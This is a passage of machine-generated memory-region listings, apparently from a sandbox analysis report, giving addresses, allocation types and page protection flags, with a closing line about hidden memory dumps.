direct allocation
|
page execute and read and write
|
||
7BB0000
|
trusted library allocation
|
page read and write
|
||
4D27000
|
heap
|
page read and write
|
||
5F96000
|
heap
|
page read and write
|
||
6AC000
|
heap
|
page read and write
|
||
5E82000
|
heap
|
page read and write
|
||
51F1000
|
heap
|
page read and write
|
||
5D61000
|
heap
|
page read and write
|
||
32FB000
|
heap
|
page read and write
|
||
EDC5000
|
trusted library allocation
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
506E000
|
heap
|
page read and write
|
||
4FC8000
|
heap
|
page read and write
|
||
4EFE000
|
stack
|
page read and write
|
||
2680000
|
heap
|
page read and write
|
||
682000
|
heap
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
612F000
|
trusted library allocation
|
page read and write
|
||
69EB000
|
stack
|
page read and write
|
||
533E000
|
stack
|
page read and write
|
||
5010000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
694000
|
heap
|
page read and write
|
||
76D0000
|
heap
|
page read and write
|
||
41B0000
|
trusted library allocation
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page read and write
|
||
90F000
|
stack
|
page read and write
|
||
6722000
|
heap
|
page read and write
|
||
32D9000
|
heap
|
page read and write
|
||
2FA1000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
4DE0000
|
trusted library allocation
|
page read and write
|
||
5E6C000
|
heap
|
page read and write
|
||
7C6E000
|
stack
|
page read and write
|
||
4FE9000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
4FC4000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
7C5E000
|
stack
|
page read and write
|
||
673A000
|
heap
|
page read and write
|
||
6DF0000
|
heap
|
page read and write
|
||
628F000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
41B8000
|
trusted library allocation
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page read and write
|
||
6B4000
|
heap
|
page read and write
|
||
8400000
|
direct allocation
|
page read and write
|
||
49D6000
|
trusted library allocation
|
page read and write
|
||
5E7D000
|
heap
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
7D30000
|
heap
|
page read and write
|
||
AA4000
|
heap
|
page read and write
|
||
51D8000
|
heap
|
page read and write
|
||
5F46000
|
heap
|
page read and write
|
||
2FAF000
|
heap
|
page read and write
|
||
76CB000
|
stack
|
page read and write
|
||
1546000
|
direct allocation
|
page execute and read and write
|
||
6733000
|
heap
|
page read and write
|
||
C5E000
|
stack
|
page read and write
|
||
5016000
|
heap
|
page read and write
|
||
66D5000
|
heap
|
page execute and read and write
|
||
5F45000
|
heap
|
page read and write
|
||
686B000
|
stack
|
page read and write
|
||
2FA6000
|
heap
|
page read and write
|
||
7D99000
|
heap
|
page read and write
|
||
4C69000
|
heap
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
303F000
|
heap
|
page read and write
|
||
5E7A000
|
heap
|
page read and write
|
||
2EB0000
|
heap
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
5D75000
|
heap
|
page read and write
|
||
676D000
|
heap
|
page read and write
|
||
7D60000
|
trusted library allocation
|
page read and write
|
||
6C5E000
|
stack
|
page read and write
|
||
6E2C000
|
heap
|
page read and write
|
||
6A1000
|
heap
|
page read and write
|
||
884D000
|
stack
|
page read and write
|
||
679C000
|
stack
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
6732000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
305F000
|
heap
|
page read and write
|
||
5109000
|
heap
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
EDFB000
|
trusted library allocation
|
page read and write
|
||
5EEC000
|
heap
|
page read and write
|
||
3040000
|
heap
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
510B000
|
heap
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
4CD0000
|
trusted library allocation
|
page read and write
|
||
519F000
|
heap
|
page read and write
|
||
305D000
|
heap
|
page read and write
|
||
692E000
|
stack
|
page read and write
|
||
686000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
572F000
|
stack
|
page read and write
|
||
5190000
|
heap
|
page read and write
|
||
6733000
|
heap
|
page read and write
|
||
28CE000
|
heap
|
page read and write
|
||
8415000
|
trusted library allocation
|
page read and write
|
||
702E000
|
stack
|
page read and write
|
||
6731000
|
heap
|
page read and write
|
||
5F9E000
|
heap
|
page read and write
|
||
9711000
|
trusted library allocation
|
page read and write
|
||
828E000
|
stack
|
page read and write
|
||
2939000
|
heap
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
64B0000
|
trusted library allocation
|
page read and write
|
||
66C6000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
524E000
|
stack
|
page read and write
|
||
5F70000
|
heap
|
page read and write
|
||
305E000
|
heap
|
page read and write
|
||
7F32000
|
trusted library allocation
|
page read and write
|
||
672E000
|
heap
|
page read and write
|
||
51B3000
|
heap
|
page read and write
|
||
5621000
|
trusted library allocation
|
page read and write
|
||
7160000
|
heap
|
page read and write
|
||
49DA000
|
trusted library allocation
|
page read and write
|
||
69AD000
|
stack
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
439000
|
stack
|
page read and write
|
||
306C000
|
heap
|
page read and write
|
||
70E0000
|
trusted library allocation
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
5EEF000
|
heap
|
page read and write
|
||
6731000
|
heap
|
page read and write
|
||
32B6000
|
heap
|
page read and write
|
||
5EF2000
|
heap
|
page read and write
|
||
7FAB8000
|
trusted library allocation
|
page execute and read and write
|
||
5F70000
|
heap
|
page read and write
|
||
5F44000
|
heap
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
580F000
|
stack
|
page read and write
|
||
51B4000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
51C0000
|
heap
|
page read and write
|
||
2F5E000
|
stack
|
page read and write
|
||
5012000
|
heap
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
65C0000
|
trusted library allocation
|
page read and write
|
||
3071000
|
heap
|
page read and write
|
||
41AE000
|
stack
|
page read and write
|
||
505C000
|
heap
|
page read and write
|
||
6A6000
|
heap
|
page read and write
|
||
64EF000
|
trusted library allocation
|
page read and write
|
||
6722000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
2D86000
|
heap
|
page read and write
|
||
4C5B000
|
heap
|
page read and write
|
||
6C2F000
|
stack
|
page read and write
|
||
5FEA000
|
trusted library allocation
|
page read and write
|
||
5F51000
|
heap
|
page read and write
|
||
888E000
|
stack
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
EDED000
|
trusted library allocation
|
page read and write
|
||
6728000
|
heap
|
page read and write
|
||
6600000
|
trusted library allocation
|
page read and write
|
||
3064000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
4D4B000
|
heap
|
page read and write
|
||
6240000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
6728000
|
heap
|
page read and write
|
||
3063000
|
heap
|
page read and write
|
||
5E7D000
|
heap
|
page read and write
|
||
570E000
|
stack
|
page read and write
|
||
307E000
|
heap
|
page read and write
|
||
41E0000
|
heap
|
page read and write
|
||
5070000
|
heap
|
page read and write
|
||
6CDE000
|
stack
|
page read and write
|
||
584B000
|
stack
|
page read and write
|
||
51F5000
|
heap
|
page read and write
|
||
87E0000
|
trusted library allocation
|
page read and write
|
||
5F81000
|
trusted library allocation
|
page read and write
|
||
4D49000
|
heap
|
page read and write
|
||
69C000
|
heap
|
page read and write
|
||
6AC0000
|
trusted library allocation
|
page read and write
|
||
305B000
|
heap
|
page read and write
|
||
4FEE000
|
heap
|
page read and write
|
||
6EE0000
|
heap
|
page read and write
|
||
A9A000
|
heap
|
page read and write
|
||
5EED000
|
heap
|
page read and write
|
||
4F3F000
|
stack
|
page read and write
|
||
15C8000
|
direct allocation
|
page execute and read and write
|
||
4E50000
|
heap
|
page read and write
|
||
22CC000
|
stack
|
page read and write
|
||
75CA000
|
stack
|
page read and write
|
||
5C90000
|
heap
|
page read and write
|
||
6090000
|
trusted library allocation
|
page read and write
|
||
180F000
|
stack
|
page read and write
|
||
5F70000
|
heap
|
page read and write
|
||
7DD000
|
stack
|
page read and write
|
||
6714000
|
heap
|
page read and write
|
||
673E000
|
heap
|
page read and write
|
||
748D000
|
stack
|
page read and write
|
||
6F82000
|
direct allocation
|
page read and write
|
||
66C4000
|
heap
|
page read and write
|
||
5E33000
|
heap
|
page read and write
|
||
3079000
|
heap
|
page read and write
|
||
6EF0000
|
trusted library allocation
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
95A0000
|
heap
|
page read and write
|
||
51EC000
|
heap
|
page read and write
|
||
5FE3000
|
trusted library allocation
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
6728000
|
heap
|
page read and write
|
||
2835000
|
trusted library allocation
|
page execute and read and write
|
||
E761000
|
trusted library allocation
|
page read and write
|
||
6B1000
|
heap
|
page read and write
|
||
862C000
|
stack
|
page read and write
|
||
824E000
|
stack
|
page read and write
|
||
4DF5000
|
trusted library allocation
|
page read and write
|
||
5E33000
|
heap
|
page read and write
|
||
6E00000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
4C1D000
|
trusted library allocation
|
page read and write
|
||
5E3E000
|
heap
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
3043000
|
heap
|
page read and write
|
||
111F000
|
stack
|
page read and write
|
||
28C0000
|
heap
|
page read and write
|
||
6F10000
|
heap
|
page execute and read and write
|
||
5D74000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
6680000
|
trusted library allocation
|
page read and write
|
||
66A1000
|
trusted library allocation
|
page read and write
|
||
83E0000
|
direct allocation
|
page read and write
|
||
3059000
|
heap
|
page read and write
|
||
9D11000
|
trusted library allocation
|
page read and write
|
||
6F72000
|
direct allocation
|
page read and write
|
||
51E0000
|
heap
|
page read and write
|
||
4FD0000
|
heap
|
page read and write
|
||
69E000
|
heap
|
page read and write
|
||
5F96000
|
heap
|
page read and write
|
||
672E000
|
heap
|
page read and write
|
||
45AD000
|
stack
|
page read and write
|
||
41E7000
|
heap
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
6B2E000
|
stack
|
page read and write
|
||
5B3E000
|
stack
|
page read and write
|
||
594C000
|
stack
|
page read and write
|
||
5E6F000
|
heap
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
3071000
|
heap
|
page read and write
|
||
7120000
|
trusted library allocation
|
page read and write
|
||
4CE0000
|
trusted library allocation
|
page read and write
|
||
5195000
|
heap
|
page read and write
|
||
5EEF000
|
heap
|
page read and write
|
||
5D04000
|
heap
|
page read and write
|
||
5F96000
|
heap
|
page read and write
|
||
2F88000
|
heap
|
page read and write
|
||
AD61000
|
trusted library allocation
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
BB3000
|
heap
|
page read and write
|
||
5E71000
|
heap
|
page read and write
|
||
7C60000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
289A000
|
heap
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page execute and read and write
|
||
5E3C000
|
heap
|
page read and write
|
||
692000
|
heap
|
page read and write
|
||
520A000
|
trusted library allocation
|
page read and write
|
||
78BE000
|
stack
|
page read and write
|
||
6724000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
699000
|
heap
|
page read and write
|
||
4E50000
|
heap
|
page read and write
|
||
6B3000
|
heap
|
page read and write
|
||
7F40000
|
trusted library section
|
page read and write
|
||
57C6000
|
trusted library allocation
|
page read and write
|
||
5F66000
|
heap
|
page read and write
|
||
6F6E000
|
stack
|
page read and write
|
||
688000
|
heap
|
page read and write
|
||
518E000
|
heap
|
page read and write
|
||
4FF7000
|
heap
|
page read and write
|
||
5080000
|
heap
|
page read and write
|
||
3077000
|
heap
|
page read and write
|
||
6641000
|
trusted library allocation
|
page read and write
|
||
66D8000
|
heap
|
page read and write
|
||
793E000
|
stack
|
page read and write
|
||
3076000
|
heap
|
page read and write
|
||
3058000
|
heap
|
page read and write
|
||
5D04000
|
heap
|
page read and write
|
||
4CE3000
|
trusted library allocation
|
page execute and read and write
|
||
13AD000
|
direct allocation
|
page execute and read and write
|
||
700D000
|
stack
|
page read and write
|
||
5E6A000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
4FE3000
|
trusted library allocation
|
page read and write
|
||
6A08000
|
heap
|
page read and write
|
||
3079000
|
heap
|
page read and write
|
||
5F9F000
|
heap
|
page read and write
|
||
4D10000
|
trusted library allocation
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
6718000
|
heap
|
page read and write
|
||
5E3C000
|
heap
|
page read and write
|
||
51E0000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
B761000
|
trusted library allocation
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
628D000
|
heap
|
page read and write
|
||
5F44000
|
heap
|
page read and write
|
||
26B0000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
EDEF000
|
trusted library allocation
|
page read and write
|
||
6648000
|
trusted library allocation
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
5E3E000
|
heap
|
page read and write
|
||
AA6000
|
heap
|
page read and write
|
||
5FE1000
|
trusted library allocation
|
page read and write
|
||
5F9B000
|
heap
|
page read and write
|
||
5E71000
|
heap
|
page read and write
|
||
A0E000
|
stack
|
page read and write
|
||
760D000
|
stack
|
page read and write
|
||
5E2F000
|
heap
|
page read and write
|
||
51F9000
|
trusted library allocation
|
page read and write
|
||
68A000
|
heap
|
page read and write
|
||
671000
|
heap
|
page read and write
|
||
5016000
|
heap
|
page read and write
|
||
6B1000
|
heap
|
page read and write
|
||
7D50000
|
trusted library allocation
|
page read and write
|
||
5F9A000
|
heap
|
page read and write
|
||
4FCB000
|
heap
|
page read and write
|
||
6F70000
|
direct allocation
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
69E000
|
heap
|
page read and write
|
||
5FEE000
|
trusted library allocation
|
page read and write
|
||
4D47000
|
heap
|
page read and write
|
||
6731000
|
heap
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
5E3E000
|
heap
|
page read and write
|
||
609F000
|
trusted library allocation
|
page read and write
|
||
5F70000
|
heap
|
page read and write
|
||
5E48000
|
heap
|
page read and write
|
||
4B09000
|
trusted library allocation
|
page read and write
|
||
66D8000
|
heap
|
page read and write
|
||
68B000
|
heap
|
page read and write
|
||
51EF000
|
trusted library allocation
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page execute and read and write
|
||
B3E000
|
stack
|
page read and write
|
||
70F0000
|
trusted library allocation
|
page read and write
|
||
6241000
|
heap
|
page read and write
|
||
307A000
|
heap
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
6ED0000
|
heap
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
6D7000
|
heap
|
page read and write
|
||
6A2000
|
heap
|
page read and write
|
||
628F000
|
heap
|
page read and write
|
||
4ECE000
|
stack
|
page read and write
|
||
671B000
|
heap
|
page read and write
|
||
6728000
|
heap
|
page read and write
|
||
C761000
|
trusted library allocation
|
page read and write
|
||
6B1000
|
heap
|
page read and write
|
||
6AC9000
|
trusted library allocation
|
page read and write
|
||
3399000
|
heap
|
page read and write
|
||
5F86000
|
heap
|
page read and write
|
||
672E000
|
heap
|
page read and write
|
||
7BE0000
|
heap
|
page execute and read and write
|
||
5007000
|
heap
|
page read and write
|
||
764B000
|
stack
|
page read and write
|
||
8D0F000
|
stack
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
4A41000
|
trusted library allocation
|
page read and write
|
||
4EA0000
|
trusted library allocation
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
517D000
|
heap
|
page read and write
|
||
66A4000
|
trusted library allocation
|
page read and write
|
||
7100000
|
trusted library allocation
|
page read and write
|
||
6AD000
|
heap
|
page read and write
|
||
57B5000
|
trusted library allocation
|
page read and write
|
||
6B4000
|
heap
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
51B9000
|
heap
|
page read and write
|
||
5F9B000
|
heap
|
page read and write
|
||
831E000
|
stack
|
page read and write
|
||
4680000
|
trusted library allocation
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
2FDF000
|
heap
|
page read and write
|
||
6E2000
|
heap
|
page read and write
|
||
62D000
|
stack
|
page read and write
|
||
5E29000
|
heap
|
page read and write
|
||
4DEC000
|
trusted library allocation
|
page read and write
|
||
6650000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
6F76000
|
direct allocation
|
page read and write
|
||
6440000
|
trusted library allocation
|
page read and write
|
||
5ED000
|
stack
|
page read and write
|
||
1531000
|
direct allocation
|
page execute and read and write
|
||
51EE000
|
heap
|
page read and write
|
||
303F000
|
heap
|
page read and write
|
||
34DE000
|
stack
|
page read and write
|
||
50CD000
|
stack
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
6B1000
|
heap
|
page read and write
|
||
4FE4000
|
heap
|
page read and write
|
||
3339000
|
heap
|
page read and write
|
||
2FDF000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
5FF7000
|
trusted library allocation
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
4F81000
|
trusted library allocation
|
page read and write
|
||
4E40000
|
trusted library allocation
|
page execute and read and write
|
||
6A8000
|
heap
|
page read and write
|
||
3058000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
7B70000
|
heap
|
page read and write
|
||
327F000
|
stack
|
page read and write
|
||
6731000
|
heap
|
page read and write
|
||
33A5000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
5F50000
|
heap
|
page read and write
|
||
6B3000
|
heap
|
page read and write
|
||
6706000
|
heap
|
page read and write
|
||
672E000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
668A000
|
trusted library allocation
|
page read and write
|
||
4FBF000
|
stack
|
page read and write
|
||
6733000
|
heap
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
68E000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
4FD3000
|
heap
|
page read and write
|
||
5066000
|
heap
|
page read and write
|
||
50D7000
|
trusted library allocation
|
page read and write
|
||
307D000
|
heap
|
page read and write
|
||
5EE0000
|
heap
|
page read and write
|
||
506A000
|
heap
|
page read and write
|
||
6EB6000
|
heap
|
page read and write
|
||
416E000
|
stack
|
page read and write
|
||
5DE4000
|
heap
|
page read and write
|
||
78FE000
|
stack
|
page read and write
|
||
7B60000
|
trusted library allocation
|
page read and write
|
||
51D7000
|
heap
|
page read and write
|
||
6241000
|
heap
|
page read and write
|
||
7DFE000
|
heap
|
page read and write
|
||
3058000
|
heap
|
page read and write
|
||
4D12000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
5E77000
|
heap
|
page read and write
|
||
6FB0000
|
heap
|
page read and write
|
||
5062000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
5E33000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
7440000
|
heap
|
page execute and read and write
|
||
26B7000
|
heap
|
page read and write
|
||
671000
|
heap
|
page read and write
|
||
16CE000
|
stack
|
page read and write
|
||
69E000
|
heap
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
303F000
|
heap
|
page read and write
|
||
2FA7000
|
heap
|
page read and write
|
||
7D70000
|
trusted library allocation
|
page read and write
|
||
7D80000
|
trusted library allocation
|
page read and write
|
||
5F96000
|
heap
|
page read and write
|
||
669C000
|
stack
|
page read and write
|
||
456C000
|
stack
|
page read and write
|
||
1440000
|
heap
|
page read and write
|
||
7F50000
|
trusted library allocation
|
page execute and read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
7170000
|
trusted library allocation
|
page read and write
|
||
82DE000
|
stack
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
5C3E000
|
stack
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
5070000
|
heap
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
2818000
|
heap
|
page read and write
|
||
6706000
|
heap
|
page read and write
|
||
72FE000
|
stack
|
page read and write
|
||
5E7D000
|
heap
|
page read and write
|
||
5F66000
|
heap
|
page read and write
|
||
66DA000
|
heap
|
page read and write
|
||
51EE000
|
heap
|
page read and write
|
||
4E9E000
|
stack
|
page read and write
|
||
4CB6000
|
heap
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
6490000
|
trusted library allocation
|
page execute
|
||
7A93000
|
heap
|
page read and write
|
||
27F3000
|
trusted library allocation
|
page execute and read and write
|
||
665E000
|
stack
|
page read and write
|
||
51D6000
|
heap
|
page read and write
|
||
51B7000
|
heap
|
page read and write
|
||
6B2E000
|
stack
|
page read and write
|
||
628D000
|
heap
|
page read and write
|
||
4E3C000
|
stack
|
page read and write
|
||
32D0000
|
heap
|
page read and write
|
||
671D000
|
heap
|
page read and write
|
||
4621000
|
trusted library allocation
|
page read and write
|
||
BD61000
|
trusted library allocation
|
page read and write
|
||
7B40000
|
trusted library allocation
|
page read and write
|
||
307A000
|
heap
|
page read and write
|
||
6728000
|
heap
|
page read and write
|
||
5F98000
|
heap
|
page read and write
|
||
282A000
|
trusted library allocation
|
page execute and read and write
|
||
7952000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
691000
|
heap
|
page read and write
|
||
5E34000
|
heap
|
page read and write
|
||
AFD000
|
stack
|
page read and write
|
||
69A000
|
heap
|
page read and write
|
||
7500000
|
trusted library allocation
|
page read and write
|
||
6AE000
|
heap
|
page read and write
|
||
41D0000
|
trusted library allocation
|
page read and write
|
||
6C9E000
|
stack
|
page read and write
|
||
737D000
|
stack
|
page read and write
|
||
6B6F000
|
stack
|
page read and write
|
||
671C000
|
stack
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
6B1000
|
heap
|
page read and write
|
||
70C0000
|
trusted library allocation
|
page execute and read and write
|
||
673D000
|
heap
|
page read and write
|
||
6FAE000
|
stack
|
page read and write
|
||
69B000
|
heap
|
page read and write
|
||
70AD000
|
stack
|
page read and write
|
||
EDD1000
|
trusted library allocation
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
8420000
|
direct allocation
|
page read and write
|
||
5168000
|
heap
|
page read and write
|
||
14D8000
|
heap
|
page read and write
|
||
5100000
|
heap
|
page read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
68F000
|
heap
|
page read and write
|
||
6097000
|
trusted library allocation
|
page read and write
|
||
5C91000
|
heap
|
page read and write
|
||
2820000
|
trusted library allocation
|
page read and write
|
||
648000
|
heap
|
page read and write
|
||
141E000
|
direct allocation
|
page execute and read and write
|
||
6EB000
|
heap
|
page read and write
|
||
2E8E000
|
stack
|
page read and write
|
||
60AB000
|
trusted library allocation
|
page read and write
|
||
5E31000
|
heap
|
page read and write
|
||
7B90000
|
trusted library allocation
|
page execute and read and write
|
||
5F98000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
6A7000
|
heap
|
page read and write
|
||
51E6000
|
heap
|
page read and write
|
||
696000
|
heap
|
page read and write
|
||
683000
|
heap
|
page read and write
|
||
514E000
|
stack
|
page read and write
|
||
6F90000
|
direct allocation
|
page read and write
|
||
80D0000
|
trusted library allocation
|
page read and write
|
||
3056000
|
heap
|
page read and write
|
||
2FE8000
|
heap
|
page read and write
|
||
E27000
|
heap
|
page read and write
|
||
6A7000
|
heap
|
page read and write
|
||
70B000
|
stack
|
page read and write
|
||
2D5F000
|
stack
|
page read and write
|
||
6724000
|
heap
|
page read and write
|
||
306D000
|
heap
|
page read and write
|
||
2D80000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
4777000
|
trusted library allocation
|
page read and write
|
||
5E6F000
|
heap
|
page read and write
|
||
87D0000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
681000
|
heap
|
page read and write
|
||
2860000
|
heap
|
page readonly
|
||
682D000
|
stack
|
page read and write
|
||
27FD000
|
trusted library allocation
|
page execute and read and write
|
||
7A64000
|
heap
|
page read and write
|
||
5FF1000
|
trusted library allocation
|
page read and write
|
||
6440000
|
heap
|
page read and write
|
||
672E000
|
heap
|
page read and write
|
||
3004000
|
heap
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
896E000
|
stack
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
307A000
|
heap
|
page read and write
|
||
4CE4000
|
trusted library allocation
|
page read and write
|
||
5D05000
|
heap
|
page read and write
|
||
8980000
|
heap
|
page read and write
|
||
8890000
|
heap
|
page read and write
|
||
74D0000
|
trusted library allocation
|
page read and write
|
||
3335000
|
heap
|
page read and write
|
||
51F5000
|
heap
|
page read and write
|
||
5F97000
|
heap
|
page read and write
|
||
33BD000
|
heap
|
page read and write
|
||
101F000
|
stack
|
page read and write
|
||
267E000
|
stack
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
5E6C000
|
heap
|
page read and write
|
||
170E000
|
stack
|
page read and write
|
||
51B6000
|
heap
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
7D40000
|
trusted library allocation
|
page read and write
|
||
5F70000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
4C50000
|
heap
|
page read and write
|
||
69F0000
|
heap
|
page read and write
|
||
2800000
|
trusted library allocation
|
page read and write
|
||
692000
|
heap
|
page read and write
|
||
66F9000
|
heap
|
page read and write
|
||
892E000
|
stack
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
505C000
|
heap
|
page read and write
|
||
A97000
|
heap
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
5E3C000
|
heap
|
page read and write
|
||
6B1000
|
heap
|
page read and write
|
||
5F70000
|
heap
|
page read and write
|
||
5EF0000
|
heap
|
page read and write
|
||
6683000
|
trusted library allocation
|
page read and write
|
||
2830000
|
trusted library allocation
|
page read and write
|
||
49E4000
|
trusted library allocation
|
page read and write
|
||
5F70000
|
heap
|
page read and write
|
||
5C0A000
|
trusted library allocation
|
page read and write
|
||
51E0000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
6E5F000
|
heap
|
page read and write
|
||
2308000
|
stack
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
57D5000
|
trusted library allocation
|
page read and write
|
||
5E3C000
|
heap
|
page read and write
|
||
EDBC000
|
trusted library allocation
|
page read and write
|
||
5E71000
|
heap
|
page read and write
|
||
D761000
|
trusted library allocation
|
page read and write
|
||
4E4F000
|
stack
|
page read and write
|
||
6706000
|
heap
|
page read and write
|
There are 923 hidden memdumps, click here to show them.